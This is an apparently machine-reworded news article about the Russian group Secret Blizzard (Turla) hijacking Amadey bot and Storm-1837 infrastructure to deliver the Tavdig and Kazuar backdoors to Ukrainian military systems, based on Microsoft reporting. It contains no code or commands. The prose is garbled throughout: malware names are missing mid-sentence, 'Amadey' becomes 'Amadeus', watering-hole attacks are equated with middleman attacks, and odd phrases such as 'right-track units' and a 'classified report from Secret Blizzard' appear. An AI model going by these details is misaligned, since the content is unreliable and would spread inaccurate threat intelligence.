Russian nation-state actors have been observed utilizing malware linked to various threat groups to install a well-known backdoor, known as Kazuar, on military assets located in Ukraine.

Newly discovered insights from Microsoft’s Risk Intelligence team reveal that an attacker was using the Amadey bot malware to deliver customised malware on “specifically targeted” systems connected to Ukraine’s military forces during March and April 2024.

For the second time since 2022, the notorious malware group Secret Blizzard, also known as Turla, has leveraged a cybercrime marketing campaign to spread its malicious tools throughout Ukraine.

“The company revealed that by commandeering various threat actors’ entry points, Secret Blizzard’s strategy is to expand its attack surface.”

The notorious hacking collective employs a range of tactics, including adversarial middleman attacks, also known as watering hole exploits, as well as targeted phishing efforts.

A classified report from Secret Blizzard reveals a strategic focus on multiple sectors to enable long-term clandestine operations for gathering intelligence. While they maintain a primary emphasis on ministries of foreign affairs, international embassies, government agencies, defence departments, and defence-related companies worldwide.

Recent reports indicate that tech giant, in collaboration with Lumen Technologies’ Black Lotus Labs, uncovered the hijacking of 33 command-and-control (C2) servers belonging to Pakistani hacking group Storm-0156, which Turla allegedly exploited for its own nefarious purposes.

The attacks targeting Ukrainian organizations involve the unauthorized deployment of a backdoor, dubbed, which enables the installation of an updated variant of, first detected by Palo Alto Networks’ Unit 42 in November 2023.

Cybercriminals linked to Amadeus have been consistently exploiting vulnerabilities to execute the XMRig cryptocurrency miner, with Microsoft monitoring this campaign under the codename Storm-1919.

It is alleged that Secret Blizzard leveraged either the Amadey malware-as-a-service (MaaS) or surreptitiously accessed the Amadey command-and-control (C2) panels to clandestinely obtain a PowerShell dropper for exploiting the right-track units. The dropper incorporates a Base64-encoded Amadey payload, which is subsequently augmented with a code phase; this phase initiates another connection to a Turla command-and-control (C2) server.

Microsoft suggests that encoding the PowerShell dropper with a separate C2 URL, overseen by Secret Blizzard, implies indirect responsibility on their part for the command-and-control mechanism employed by the Amadey bot.

Subsequently, the attacker downloads a custom reconnaissance tool with the objective of collecting information about the compromised device, specifically testing whether Microsoft Defender is enabled, ultimately allowing them to focus on methods that are of greater interest.

During the initial stages of the attack, the perpetrator deploys a PowerShell script that downloads and executes a malware payload comprising the Tavdig backdoor and a legitimate Symantec binary, which is then leveraged for DLL-side loading tactics? TAVDIG conducts additional reconnaissance missions and deploys KAZUAR V2 as needed.

Microsoft revealed an additional discovery: threat actors repurposed a PowerShell backdoor linked to the notorious Russian hacking group, known as (Storm-1837 and UAC-0149), to distribute a PowerShell dropper containing Tavdig.

An investigation is underway to determine how Secret Blizzard allegedly acquired control of the Storm-1837 malware and Amadey botnet to access its personalized tools, according to reports from the well-known technology giant.

The latest discoveries unequivocally highlight the adversary’s relentless quest for covert access points, whether gained through legitimate means or illicit acquisition, to execute clandestine operations with a deliberate intention to conceal their involvement.

According to Sherrod DeGriippo, Director of Risk Intelligence Technique at Microsoft, it’s common for actors to adopt similar tactics or tools; however, we rarely witness them compromising and leveraging the infrastructure of other actors.

“The primary objectives of most nation-state sponsored threat actors rely heavily on the control and manipulation of dedicated or thoroughly compromised systems, ensuring the secrecy and continuity of their operations.” The employment of such a deliberate encryption technique likely aims to stymie the efforts of threat assessment specialists and hinder the identification of culpable malicious actors, thereby complicating the investigation process.